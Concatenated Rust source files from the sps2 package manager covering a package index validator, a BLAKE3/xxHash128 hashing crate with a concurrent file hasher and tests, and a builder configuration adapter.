    pub spdx: SbomEntry,
    /// Optional CycloneDX document location and hash.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub cyclonedx: Option<SbomEntry>,
}
/// SBOM entry
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SbomEntry {
    /// URL to download the SBOM document from.
    pub url: String,
    /// BLAKE3 hash of the SBOM document for verification.
    pub blake3: String,
}
impl Default for Index {
    /// Delegates to [`Index::new`]: an empty package map with metadata
    /// stamped at the current time and the supported format version.
    fn default() -> Self {
        Self::new()
    }
}
impl Index {
/// Create a new empty index
#[must_use]
pub fn new() -> Self {
Self {
metadata: IndexMetadata {
version: crate::SUPPORTED_INDEX_VERSION,
minimum_client: "0.1.0".to_string(),
timestamp: Utc::now(),
},
packages: HashMap::new(),
}
}
/// Parse index from JSON
///
/// # Errors
///
/// Returns an error if the JSON is malformed or cannot be parsed.
pub fn from_json(json: &str) -> Result<Self, Error> {
serde_json::from_str(json).map_err(|e| {
PackageError::InvalidFormat {
message: format!("invalid index JSON: {e}"),
}
.into()
})
}
/// Serialize index to JSON
///
/// # Errors
///
/// Returns an error if the index cannot be serialized to JSON.
pub fn to_json(&self) -> Result<String, Error> {
serde_json::to_string_pretty(self).map_err(|e| {
PackageError::InvalidFormat {
message: format!("failed to serialize index: {e}"),
}
.into()
})
}
/// Validate index format and version
///
/// # Errors
///
/// Returns an error if the index version is unsupported, package names are empty,
/// versions are missing, architectures are unsupported, or required fields are missing.
pub fn validate(&self) -> Result<(), Error> {
// Check version compatibility
if self.metadata.version > crate::SUPPORTED_INDEX_VERSION {
return Err(PackageError::InvalidFormat {
message: format!(
"index version {} is newer than supported version {}",
self.metadata.version,
crate::SUPPORTED_INDEX_VERSION
),
}
.into());
}
// Validate entries
for (name, package) in &self.packages {
if name.is_empty() {
return Err(PackageError::InvalidFormat {
message: "empty package name in index".to_string(),
}
.into());
}
for (version, entry) in &package.versions {
if version.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("empty version for package {name}"),
}
.into());
}
// Validate architecture
if entry.arch != "arm64" {
return Err(PackageError::InvalidFormat {
message: format!("unsupported architecture: {}", entry.arch),
}
.into());
}
// Validate URLs
if entry.download_url.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("missing download URL for {name}-{version}"),
}
.into());
}
if entry.blake3.is_empty() {
return Err(PackageError::InvalidFormat {
message: format!("missing BLAKE3 hash for {name}-{version}"),
}
.into());
}
}
}
Ok(())
}
/// Add or update a package version
pub fn add_version(&mut self, name: String, version: String, entry: VersionEntry) {
self.packages
.entry(name)
.or_default()
.versions
.insert(version, entry);
}
/// Remove a package version
pub fn remove_version(&mut self, name: &str, version: &str) -> Option<VersionEntry> {
self.packages.get_mut(name)?.versions.remove(version)
}
/// Get total package count
#[must_use]
pub fn package_count(&self) -> usize {
self.packages.len()
}
/// Get total version count
#[must_use]
pub fn version_count(&self) -> usize {
self.packages.values().map(|p| p.versions.len()).sum()
}
}
impl VersionEntry {
    /// Get the version string from the parent context
    /// (In actual use, version is the `HashMap` key)
    #[must_use]
    pub fn version(&self) -> String {
        // Placeholder: callers already know the version from the map key.
        String::new()
    }

    /// Get architecture as enum
    ///
    /// # Errors
    ///
    /// Returns an error if the architecture string is not supported.
    pub fn arch(&self) -> Result<Arch, Error> {
        if self.arch == "arm64" {
            Ok(Arch::Arm64)
        } else {
            Err(PackageError::InvalidFormat {
                message: format!("unsupported architecture: {}", self.arch),
            }
            .into())
        }
    }

    /// Check if this version has SBOM data
    #[must_use]
    pub fn has_sbom(&self) -> bool {
        self.sbom.is_some()
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/hash/src/lib.rs | crates/hash/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(clippy::module_name_repetitions)]
//! Dual hashing for sps2: BLAKE3 for downloads, xxHash for local verification
//!
//! This crate provides hashing functionality for content-addressed storage
//! and integrity verification using different algorithms for different purposes.
mod file_hasher;
pub use file_hasher::{calculate_file_storage_path, FileHashResult, FileHasher, FileHasherConfig};
use blake3::Hasher as Blake3Hasher;
use serde::{Deserialize, Serialize};
use sps2_errors::{Error, StorageError};
use std::collections::BTreeMap;
use std::fmt;
use std::path::Path;
use tokio::fs::File;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use xxhash_rust::xxh3::Xxh3;
/// Size of chunks for streaming hash computation
const CHUNK_SIZE: usize = 64 * 1024; // 64KB
/// Hash algorithm type
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub enum HashAlgorithm {
    /// BLAKE3 (32-byte digest) - used for download verification
    Blake3,
    /// xxHash 128-bit (16-byte digest) - used for local verification
    XxHash128,
}
impl Default for HashAlgorithm {
    /// xxHash128 is the default: local verification is the common case,
    /// and BLAKE3 is only needed for download verification.
    fn default() -> Self {
        Self::XxHash128 // Default to xxHash for local operations
    }
}
/// A hash value that can use different algorithms
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct Hash {
    /// Which algorithm produced `bytes` (determines the expected length).
    algorithm: HashAlgorithm,
    bytes: Vec<u8>, // Variable length to support different hash sizes
}
impl Hash {
    /// Create a BLAKE3 hash from raw bytes (32 bytes)
    #[must_use]
    pub fn from_blake3_bytes(bytes: [u8; 32]) -> Self {
        Self {
            algorithm: HashAlgorithm::Blake3,
            bytes: bytes.to_vec(),
        }
    }

    /// Create an xxHash 128-bit hash from raw bytes (16 bytes)
    #[must_use]
    pub fn from_xxhash128_bytes(bytes: [u8; 16]) -> Self {
        Self {
            algorithm: HashAlgorithm::XxHash128,
            bytes: bytes.to_vec(),
        }
    }

    /// Get the hash algorithm
    #[must_use]
    pub fn algorithm(&self) -> HashAlgorithm {
        self.algorithm
    }

    /// Get the raw bytes
    #[must_use]
    pub fn as_bytes(&self) -> &[u8] {
        &self.bytes
    }

    /// Convert to hex string
    #[must_use]
    pub fn to_hex(&self) -> String {
        hex::encode(&self.bytes)
    }

    /// Parse from hex string (detects algorithm based on length:
    /// 32 bytes = BLAKE3, 16 bytes = xxHash128)
    ///
    /// # Errors
    /// Returns an error if the input string is not valid hexadecimal.
    pub fn from_hex(s: &str) -> Result<Self, Error> {
        let bytes = hex::decode(s).map_err(|e| StorageError::CorruptedData {
            message: format!("invalid hex: {e}"),
        })?;

        // The digest length uniquely identifies the algorithm.
        match bytes.len() {
            32 => {
                let mut array = [0u8; 32];
                array.copy_from_slice(&bytes);
                Ok(Self::from_blake3_bytes(array))
            }
            16 => {
                let mut array = [0u8; 16];
                array.copy_from_slice(&bytes);
                Ok(Self::from_xxhash128_bytes(array))
            }
            _ => Err(StorageError::CorruptedData {
                message: format!("hash must be 16 or 32 bytes, got {}", bytes.len()),
            }
            .into()),
        }
    }

    /// Compute hash of a byte slice using default algorithm (xxHash128)
    #[must_use]
    pub fn from_data(data: &[u8]) -> Self {
        Self::from_data_with_algorithm(data, HashAlgorithm::default())
    }

    /// Compute hash of a byte slice using specified algorithm
    ///
    /// Uses the one-shot hash functions, which avoid streaming overhead
    /// for data that is already in memory.
    #[must_use]
    pub fn from_data_with_algorithm(data: &[u8], algorithm: HashAlgorithm) -> Self {
        match algorithm {
            HashAlgorithm::Blake3 => {
                let hash = blake3::hash(data);
                Self::from_blake3_bytes(*hash.as_bytes())
            }
            HashAlgorithm::XxHash128 => {
                let hash = xxhash_rust::xxh3::xxh3_128(data);
                Self::from_xxhash128_bytes(hash.to_le_bytes())
            }
        }
    }

    /// Compute BLAKE3 hash of a byte slice (for download verification)
    #[must_use]
    pub fn blake3_from_data(data: &[u8]) -> Self {
        Self::from_data_with_algorithm(data, HashAlgorithm::Blake3)
    }

    /// Compute xxHash128 hash of a byte slice (for local verification)
    #[must_use]
    pub fn xxhash128_from_data(data: &[u8]) -> Self {
        Self::from_data_with_algorithm(data, HashAlgorithm::XxHash128)
    }

    /// Check if this is a BLAKE3 hash
    #[must_use]
    pub fn is_blake3(&self) -> bool {
        matches!(self.algorithm, HashAlgorithm::Blake3)
    }

    /// Check if this is an xxHash128 hash
    #[must_use]
    pub fn is_xxhash128(&self) -> bool {
        matches!(self.algorithm, HashAlgorithm::XxHash128)
    }

    /// Get the expected byte length for this hash algorithm
    #[must_use]
    pub fn expected_length(&self) -> usize {
        match self.algorithm {
            HashAlgorithm::Blake3 => 32,
            HashAlgorithm::XxHash128 => 16,
        }
    }

    /// Compute hash of a file using default algorithm (xxHash128)
    ///
    /// # Errors
    /// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
    pub async fn hash_file(path: &Path) -> Result<Self, Error> {
        Self::hash_file_with_algorithm(path, HashAlgorithm::default()).await
    }

    /// Compute hash of a file using specified algorithm
    ///
    /// # Errors
    /// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
    pub async fn hash_file_with_algorithm(
        path: &Path,
        algorithm: HashAlgorithm,
    ) -> Result<Self, Error> {
        let mut file = File::open(path)
            .await
            .map_err(|_| StorageError::PathNotFound {
                path: path.display().to_string(),
            })?;

        // Stream the file through the hasher in CHUNK_SIZE pieces.
        let mut hasher = StreamingHasher::new(algorithm);
        let mut buffer = vec![0; CHUNK_SIZE];
        loop {
            let n = file.read(&mut buffer).await?;
            if n == 0 {
                break;
            }
            hasher.update(&buffer[..n]);
        }
        Ok(hasher.finalize())
    }

    /// Compute BLAKE3 hash of a file (for download verification)
    ///
    /// # Errors
    /// Returns an error if the file cannot be opened, read, or if any I/O operation fails.
    pub async fn blake3_hash_file(path: &Path) -> Result<Self, Error> {
        Self::hash_file_with_algorithm(path, HashAlgorithm::Blake3).await
    }

    /// Compute hash while copying data to a writer using default algorithm (xxHash128)
    ///
    /// # Errors
    /// Returns an error if reading from the reader or writing to the writer fails.
    pub async fn hash_and_copy<R, W>(reader: R, writer: W) -> Result<(Self, u64), Error>
    where
        R: AsyncReadExt + Unpin,
        W: AsyncWriteExt + Unpin,
    {
        Self::hash_and_copy_with_algorithm(reader, writer, HashAlgorithm::default()).await
    }

    /// Compute hash while copying data to a writer using specified algorithm
    ///
    /// Returns the hash together with the total number of bytes copied.
    ///
    /// # Errors
    /// Returns an error if reading from the reader or writing to the writer fails.
    pub async fn hash_and_copy_with_algorithm<R, W>(
        mut reader: R,
        mut writer: W,
        algorithm: HashAlgorithm,
    ) -> Result<(Self, u64), Error>
    where
        R: AsyncReadExt + Unpin,
        W: AsyncWriteExt + Unpin,
    {
        let mut hasher = StreamingHasher::new(algorithm);
        let mut buffer = vec![0; CHUNK_SIZE];
        let mut total_bytes = 0u64;

        loop {
            let n = reader.read(&mut buffer).await?;
            if n == 0 {
                break;
            }
            hasher.update(&buffer[..n]);
            writer.write_all(&buffer[..n]).await?;
            total_bytes += n as u64;
        }

        // Flush so all copied bytes are visible to the caller on return.
        writer.flush().await?;
        Ok((hasher.finalize(), total_bytes))
    }

    /// Compute deterministic hash of a directory's contents using default algorithm (xxHash128)
    ///
    /// This creates a reproducible hash by:
    /// 1. Sorting all files by relative path
    /// 2. Hashing each file's relative path, permissions, and contents
    /// 3. Combining all hashes in a deterministic order
    ///
    /// # Errors
    /// Returns an error if directory traversal or file operations fail.
    pub async fn hash_directory(dir_path: &Path) -> Result<Self, Error> {
        Self::hash_directory_with_algorithm(dir_path, HashAlgorithm::default()).await
    }

    /// Compute deterministic hash of a directory's contents using specified algorithm
    ///
    /// # Errors
    /// Returns an error if directory traversal or file operations fail.
    pub async fn hash_directory_with_algorithm(
        dir_path: &Path,
        algorithm: HashAlgorithm,
    ) -> Result<Self, Error> {
        // Collect entries first; the BTreeMap iterates in sorted path order,
        // which is what makes the resulting hash deterministic.
        let mut files = BTreeMap::new();
        collect_files(dir_path, dir_path, &mut files).await?;

        let mut dir_hasher = StreamingHasher::new(algorithm);
        for (rel_path, (full_path, metadata)) in files {
            // Relative path, NUL-separated from the rest of the record.
            dir_hasher.update(rel_path.as_bytes());
            dir_hasher.update(b"\0");

            // Unix permissions participate so mode changes alter the hash.
            #[cfg(unix)]
            {
                use std::os::unix::fs::PermissionsExt;
                let mode = metadata.permissions().mode();
                dir_hasher.update(&mode.to_le_bytes());
            }

            if metadata.is_file() {
                // Hash file contents via the single-file path.
                let file_hash = Self::hash_file_with_algorithm(&full_path, algorithm).await?;
                dir_hasher.update(file_hash.as_bytes());
            } else if metadata.is_symlink() {
                // Symlinks contribute their target path, not their contents.
                let target = tokio::fs::read_link(&full_path).await?;
                dir_hasher.update(target.to_string_lossy().as_bytes());
            }

            // Record terminator.
            dir_hasher.update(b"\0");
        }
        Ok(dir_hasher.finalize())
    }
}

/// Internal streaming hasher that abstracts over the supported algorithms,
/// so the file, stream, and directory hashing paths share one loop instead
/// of one duplicated loop per algorithm.
enum StreamingHasher {
    Blake3(Blake3Hasher),
    XxHash128(Xxh3),
}

impl StreamingHasher {
    /// Create an empty hash state for the given algorithm.
    fn new(algorithm: HashAlgorithm) -> Self {
        match algorithm {
            HashAlgorithm::Blake3 => Self::Blake3(Blake3Hasher::new()),
            HashAlgorithm::XxHash128 => Self::XxHash128(Xxh3::new()),
        }
    }

    /// Feed a chunk of data into the hash state.
    fn update(&mut self, data: &[u8]) {
        match self {
            Self::Blake3(h) => {
                h.update(data);
            }
            Self::XxHash128(h) => h.update(data),
        }
    }

    /// Consume the state and produce the final [`Hash`] value.
    fn finalize(self) -> Hash {
        match self {
            Self::Blake3(h) => Hash::from_blake3_bytes(*h.finalize().as_bytes()),
            Self::XxHash128(h) => Hash::from_xxhash128_bytes(h.digest128().to_le_bytes()),
        }
    }
}
impl fmt::Display for Hash {
    /// Formats the hash as a lowercase hex string, matching [`Hash::to_hex`].
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        f.write_str(&self.to_hex())
    }
}
impl Serialize for Hash {
    // Serialize as a hex string so hashes are human-readable in JSON.
    fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
    where
        S: serde::Serializer,
    {
        serializer.serialize_str(&self.to_hex())
    }
}
impl<'de> Deserialize<'de> for Hash {
    // Deserialize from the hex form written by `Serialize`; `from_hex`
    // infers the algorithm from the digest length (16 = xxHash128, 32 = BLAKE3).
    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
    where
        D: serde::Deserializer<'de>,
    {
        let s = String::deserialize(deserializer)?;
        Self::from_hex(&s).map_err(serde::de::Error::custom)
    }
}
/// Verify a file matches an expected hash
///
/// The file is re-hashed with the default algorithm; a hash computed with a
/// different algorithm therefore never compares equal.
///
/// # Errors
/// Returns an error if the file cannot be read or hashed.
pub async fn verify_file(path: &Path, expected: &Hash) -> Result<bool, Error> {
    Ok(Hash::hash_file(path).await? == *expected)
}
/// Create a content-addressed path from a hash
///
/// The path component is simply the hash's hex digest.
#[must_use]
pub fn content_path(hash: &Hash) -> String {
    hash.to_hex()
}
/// Helper function to collect all files in a directory recursively
///
/// Keys are paths relative to `base_path`; values carry the absolute path
/// and the entry's metadata. A `BTreeMap` is used so iteration order is
/// deterministic for directory hashing.
async fn collect_files(
    base_path: &Path,
    current_path: &Path,
    files: &mut BTreeMap<String, (std::path::PathBuf, std::fs::Metadata)>,
) -> Result<(), Error> {
    let mut entries = tokio::fs::read_dir(current_path).await?;

    while let Some(entry) = entries.next_entry().await? {
        let path = entry.path();
        let metadata = entry.metadata().await?;

        // Key entries by their path relative to the traversal root.
        let rel_path = path
            .strip_prefix(base_path)
            .map_err(|_| StorageError::IoError {
                message: "failed to compute relative path".to_string(),
            })?
            .to_string_lossy()
            .to_string();

        // Decide on recursion before `metadata` is moved into the map; this
        // lets both `rel_path` and `metadata` be moved instead of cloned.
        let is_dir = metadata.is_dir();
        files.insert(rel_path, (path.clone(), metadata));

        // Recurse into directories (Box::pin because async recursion would
        // otherwise create a self-referential future type).
        if is_dir {
            Box::pin(collect_files(base_path, &path, files)).await?;
        }
    }

    Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/hash/src/file_hasher.rs | crates/hash/src/file_hasher.rs | //! File-level hashing operations for content-addressed storage
//!
//! This module provides functionality for hashing individual files
//! during package extraction and installation, supporting parallel
//! processing and metadata collection.
use crate::Hash;
use sps2_errors::{Error, StorageError};
use std::path::{Path, PathBuf};
use tokio::sync::mpsc;
use tokio::task::JoinSet;
/// Result of hashing a single file
#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)]
pub struct FileHashResult {
    /// Relative path within the package
    pub relative_path: String,
    /// Hash of the file contents (algorithm depends on context).
    /// Directories hash empty data; symlinks hash their target path.
    pub hash: Hash,
    /// File size in bytes (for symlinks: byte length of the target path)
    pub size: u64,
    /// Whether this is a directory
    pub is_directory: bool,
    /// Whether this is a symlink
    pub is_symlink: bool,
    /// Unix permissions (if available)
    #[cfg(unix)]
    pub mode: Option<u32>,
}
/// Configuration for file hashing operations
#[derive(Debug, Clone)]
pub struct FileHasherConfig {
    /// Maximum number of concurrent hash operations
    pub max_concurrency: usize,
    /// Whether to follow symlinks
    /// (NOTE(review): not referenced in the code visible here — confirm
    /// the traversal honors it)
    pub follow_symlinks: bool,
    /// Whether to include directory entries
    pub include_directories: bool,
}
impl Default for FileHasherConfig {
    /// Defaults: 4 concurrent hashers, do not follow symlinks, and include
    /// directory entries in the results.
    fn default() -> Self {
        Self {
            max_concurrency: 4,
            follow_symlinks: false,
            include_directories: true,
        }
    }
}
/// File hasher for processing multiple files
#[derive(Debug)]
pub struct FileHasher {
    /// Concurrency and traversal options applied to every operation.
    config: FileHasherConfig,
}
impl FileHasher {
    /// Create a new file hasher with the given configuration
    ///
    /// The configuration controls concurrency and traversal behavior for
    /// all subsequent hashing operations.
    #[must_use]
    pub fn new(config: FileHasherConfig) -> Self {
        Self { config }
    }
/// Hash a single file and collect metadata
///
/// # Errors
/// Returns an error if the file cannot be read or metadata cannot be accessed
pub async fn hash_file_with_metadata(
&self,
path: &Path,
base_path: &Path,
) -> Result<FileHashResult, Error> {
let metadata = tokio::fs::symlink_metadata(path).await?;
// Calculate relative path
let relative_path = path
.strip_prefix(base_path)
.map_err(|_| StorageError::IoError {
message: format!("failed to compute relative path for {}", path.display()),
})?
.to_string_lossy()
.to_string();
// Handle different file types
if metadata.is_dir() {
Ok(FileHashResult {
relative_path,
hash: Hash::from_data(b""), // Empty hash for directories
size: 0,
is_directory: true,
is_symlink: false,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
} else if metadata.is_symlink() {
// For symlinks, hash the target path
let target = tokio::fs::read_link(path).await?;
let target_string = target.to_string_lossy().to_string();
let target_bytes = target_string.as_bytes();
Ok(FileHashResult {
relative_path,
hash: Hash::from_data(target_bytes),
size: target_bytes.len() as u64,
is_directory: false,
is_symlink: true,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
} else {
// Regular file
let hash = Hash::hash_file(path).await?;
Ok(FileHashResult {
relative_path,
hash,
size: metadata.len(),
is_directory: false,
is_symlink: false,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
}
}
/// Hash all files in a directory recursively
///
/// # Errors
/// Returns an error if directory traversal fails or file operations fail
pub async fn hash_directory(&self, dir_path: &Path) -> Result<Vec<FileHashResult>, Error> {
let (tx, mut rx) = mpsc::unbounded_channel();
let base_path = dir_path.to_path_buf();
// Spawn task to collect files
let collector_handle = tokio::spawn({
let base_path = base_path.clone();
let tx = tx.clone();
let include_dirs = self.config.include_directories;
async move { collect_files_for_hashing(&base_path, &base_path, tx, include_dirs).await }
});
// Drop the original sender so the channel closes when collection is done
drop(tx);
// Process files with limited concurrency
let mut results = Vec::new();
let mut tasks = JoinSet::new();
let semaphore =
std::sync::Arc::new(tokio::sync::Semaphore::new(self.config.max_concurrency));
while let Some(file_path) = rx.recv().await {
let permit =
semaphore
.clone()
.acquire_owned()
.await
.map_err(|e| StorageError::IoError {
message: format!("semaphore acquire error: {e}"),
})?;
let base_path = base_path.clone();
let hasher = self.clone();
tasks.spawn(async move {
let _permit = permit; // Hold permit until task completes
hasher.hash_file_with_metadata(&file_path, &base_path).await
});
}
// Wait for collector to finish
collector_handle.await.map_err(|e| StorageError::IoError {
message: format!("task join error: {e}"),
})??;
// Collect all results
while let Some(result) = tasks.join_next().await {
match result {
Ok(Ok(hash_result)) => results.push(hash_result),
Ok(Err(e)) => return Err(e),
Err(e) => {
return Err(StorageError::IoError {
message: format!("task join error: {e}"),
}
.into())
}
}
}
// Sort results by path for deterministic output
results.sort_by(|a, b| a.relative_path.cmp(&b.relative_path));
Ok(results)
}
/// Hash files from an iterator of paths
///
/// # Errors
/// Returns an error if any file operation fails
pub async fn hash_files<I, P>(
&self,
base_path: &Path,
paths: I,
) -> Result<Vec<FileHashResult>, Error>
where
I: IntoIterator<Item = P>,
P: AsRef<Path>,
{
let mut tasks = JoinSet::new();
let semaphore =
std::sync::Arc::new(tokio::sync::Semaphore::new(self.config.max_concurrency));
let base_path = base_path.to_path_buf();
for path in paths {
let file_path = base_path.join(path.as_ref());
let permit =
semaphore
.clone()
.acquire_owned()
.await
.map_err(|e| StorageError::IoError {
message: format!("semaphore acquire error: {e}"),
})?;
let base_path = base_path.clone();
let hasher = self.clone();
tasks.spawn(async move {
let _permit = permit;
hasher.hash_file_with_metadata(&file_path, &base_path).await
});
}
let mut results = Vec::new();
while let Some(result) = tasks.join_next().await {
match result {
Ok(Ok(hash_result)) => results.push(hash_result),
Ok(Err(e)) => return Err(e),
Err(e) => {
return Err(StorageError::IoError {
message: format!("task join error: {e}"),
}
.into())
}
}
}
results.sort_by(|a, b| a.relative_path.cmp(&b.relative_path));
Ok(results)
}
}
impl Clone for FileHasher {
fn clone(&self) -> Self {
Self {
config: self.config.clone(),
}
}
}
/// Recursively walk `current_path`, sending every entry that should be hashed
/// through `tx`.
///
/// Directories are sent only when `include_directories` is set and are always
/// descended into; files and symlinks are sent as-is. Send failures are
/// ignored on purpose: a closed channel just means the consumer went away.
async fn collect_files_for_hashing(
    base_path: &Path,
    current_path: &Path,
    tx: mpsc::UnboundedSender<PathBuf>,
    include_directories: bool,
) -> Result<(), Error> {
    let mut dir = tokio::fs::read_dir(current_path).await?;
    while let Some(entry) = dir.next_entry().await? {
        let entry_path = entry.path();
        if !entry.metadata().await?.is_dir() {
            // Regular file or symlink: hand it straight to the hashers.
            let _ = tx.send(entry_path);
            continue;
        }
        if include_directories {
            let _ = tx.send(entry_path.clone());
        }
        // Recursion inside an async fn requires boxing the future.
        Box::pin(collect_files_for_hashing(
            base_path,
            &entry_path,
            tx.clone(),
            include_directories,
        ))
        .await?;
    }
    Ok(())
}
/// Calculate the storage path for a file based on its hash
///
/// Returns the path components: (prefix, `full_hash`)
/// For example: hash "abc123..." -> ("ab/c1", "abc123...")
#[must_use]
pub fn calculate_file_storage_path(hash: &Hash) -> (String, String) {
    let hex = hash.to_hex();
    // Shard by the first four hex characters: "ab" then "c1".
    let mut nibbles = hex.chars();
    let first: String = nibbles.by_ref().take(2).collect();
    let second: String = nibbles.take(2).collect();
    (format!("{first}/{second}"), hex)
}
#[cfg(test)]
mod tests {
    use super::*;
    use tempfile::TempDir;
    use tokio::fs;
    // A regular file should be hashed by content with correct relative path
    // and metadata flags.
    #[tokio::test]
    async fn test_hash_single_file() {
        let temp_dir = TempDir::new().unwrap();
        let file_path = temp_dir.path().join("test.txt");
        fs::write(&file_path, b"Hello, world!").await.unwrap();
        let hasher = FileHasher::new(FileHasherConfig::default());
        let result = hasher
            .hash_file_with_metadata(&file_path, temp_dir.path())
            .await
            .unwrap();
        assert_eq!(result.relative_path, "test.txt");
        assert_eq!(result.size, 13); // "Hello, world!" is 13 bytes
        assert!(!result.is_directory);
        assert!(!result.is_symlink);
    }
    // Recursive traversal should find nested files; directory entries are
    // included too because `include_directories` defaults to true.
    #[tokio::test]
    async fn test_hash_directory() {
        let temp_dir = TempDir::new().unwrap();
        // Create test structure
        fs::create_dir(temp_dir.path().join("subdir"))
            .await
            .unwrap();
        fs::write(temp_dir.path().join("file1.txt"), b"content1")
            .await
            .unwrap();
        fs::write(temp_dir.path().join("subdir/file2.txt"), b"content2")
            .await
            .unwrap();
        let hasher = FileHasher::new(FileHasherConfig::default());
        let results = hasher.hash_directory(temp_dir.path()).await.unwrap();
        // Entries: `subdir` plus the two files (the root itself is not listed)
        assert!(results.len() >= 2); // At least the two files
        // Check that files are sorted by path
        let file_results: Vec<_> = results.iter().filter(|r| !r.is_directory).collect();
        assert!(file_results.iter().any(|r| r.relative_path == "file1.txt"));
        assert!(file_results
            .iter()
            .any(|r| r.relative_path == "subdir/file2.txt"));
    }
    // The two-level shard prefix must be "xx/yy" built from the first four
    // hex characters of the hash.
    #[test]
    fn test_storage_path_calculation() {
        let hash = Hash::from_data(b"test data");
        let (prefix, full_hash) = calculate_file_storage_path(&hash);
        assert_eq!(prefix.len(), 5); // "xx/yy"
        assert_eq!(full_hash, hash.to_hex());
        let expected_prefix = format!("{}/{}", &full_hash[0..2], &full_hash[2..4]);
        assert_eq!(prefix, expected_prefix);
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/config.rs | crates/builder/src/config.rs | #![deny(clippy::pedantic, unsafe_code)]
//! Builder configuration integration and utilities
//!
//! This module provides integration between the builder crate and the unified
//! configuration system in `sps2_config`. All configuration types are now
//! centralized in the config crate.
use sps2_config::builder::{
BuildSettings, BuilderConfig, CacheSettings, EnvironmentSettings, PackagingSettings,
PerformanceSettings, SbomSettings, SecuritySettings, ShellExpansionPolicy, SigningSettings,
ValidationConfig, ValidationMode,
};
use sps2_config::ResourceManager;
use std::sync::Arc;
/// Builder context configuration
///
/// This struct adapts the centralized `BuilderConfig` for use within
/// the builder crate, adding runtime-specific fields like `ResourceManager`.
#[derive(Clone, Debug)]
pub struct BuildConfig {
    /// Core builder configuration from config crate
    pub config: BuilderConfig,
    /// Resource manager for build operations (shared via `Arc` across clones)
    pub resources: Arc<ResourceManager>,
    /// sps2 system configuration (for command validation); optional, set via
    /// `with_sps2_config`
    pub sps2_config: Option<sps2_config::Config>,
}
impl BuildConfig {
    /// Create a new `BuildConfig` from a `BuilderConfig`
    ///
    /// Uses a fresh default `ResourceManager` and no sps2 system config.
    #[must_use]
    pub fn new(config: BuilderConfig) -> Self {
        Self {
            config,
            resources: Arc::new(ResourceManager::default()),
            sps2_config: None,
        }
    }
    /// Create a new `BuildConfig` with custom `ResourceManager`
    #[must_use]
    pub fn with_resources(config: BuilderConfig, resources: Arc<ResourceManager>) -> Self {
        Self {
            config,
            resources,
            sps2_config: None,
        }
    }
    /// Create a new `BuildConfig` with `sps2_config`
    #[must_use]
    pub fn with_sps2_config(mut self, sps2_config: sps2_config::Config) -> Self {
        self.sps2_config = Some(sps2_config);
        self
    }
    // --- Read-only accessors into the nested BuilderConfig ---
    /// Get build settings
    #[must_use]
    pub fn build_settings(&self) -> &BuildSettings {
        &self.config.build
    }
    /// Get packaging settings
    #[must_use]
    pub fn packaging_settings(&self) -> &PackagingSettings {
        &self.config.packaging
    }
    /// Get environment settings
    #[must_use]
    pub fn environment_settings(&self) -> &EnvironmentSettings {
        &self.config.environment
    }
    /// Get performance settings
    #[must_use]
    pub fn performance_settings(&self) -> &PerformanceSettings {
        &self.config.performance
    }
    /// Get security settings
    #[must_use]
    pub fn security_settings(&self) -> &SecuritySettings {
        &self.config.security
    }
    /// Get SBOM configuration
    #[must_use]
    pub fn sbom_config(&self) -> &SbomSettings {
        &self.config.packaging.sbom
    }
    /// Get signing configuration
    #[must_use]
    pub fn signing_config(&self) -> &SigningSettings {
        &self.config.packaging.signing
    }
    /// Get cache configuration
    #[must_use]
    pub fn cache_config(&self) -> &CacheSettings {
        &self.config.performance.cache
    }
    /// Get validation configuration
    #[must_use]
    pub fn validation_config(&self) -> &ValidationConfig {
        &self.config.security.validation
    }
    /// Get default network access policy (can be overridden by recipe)
    #[must_use]
    pub fn default_allow_network(&self) -> bool {
        self.config.build.default_allow_network
    }
    /// Get default isolation level (can be overridden by recipe)
    #[must_use]
    pub fn default_isolation_level(&self) -> &str {
        &self.config.build.default_isolation_level
    }
    /// Get maximum build time in seconds
    ///
    /// Currently always `Some` (taken from `build.timeout_seconds`); the
    /// `Option` wrapper is kept for API compatibility.
    #[must_use]
    pub fn max_build_time(&self) -> Option<u64> {
        Some(self.config.build.timeout_seconds)
    }
    /// Get number of parallel build jobs
    ///
    /// A configured value of 0 means "auto-detect" and is reported as `None`.
    #[must_use]
    pub fn build_jobs(&self) -> Option<usize> {
        if self.config.build.build_jobs == 0 {
            None // Auto-detect
        } else {
            Some(self.config.build.build_jobs)
        }
    }
    /// Get build root directory
    #[must_use]
    pub fn build_root(&self) -> &std::path::Path {
        &self.config.build.build_root
    }
    /// Check if strict validation is enabled
    #[must_use]
    pub fn is_strict_validation(&self) -> bool {
        matches!(self.config.security.validation.mode, ValidationMode::Strict)
    }
    /// Check if shell expansion is allowed
    #[must_use]
    pub fn allow_shell_expansion(&self) -> bool {
        matches!(
            self.config.security.validation.shell_expansion,
            ShellExpansionPolicy::Enabled
        )
    }
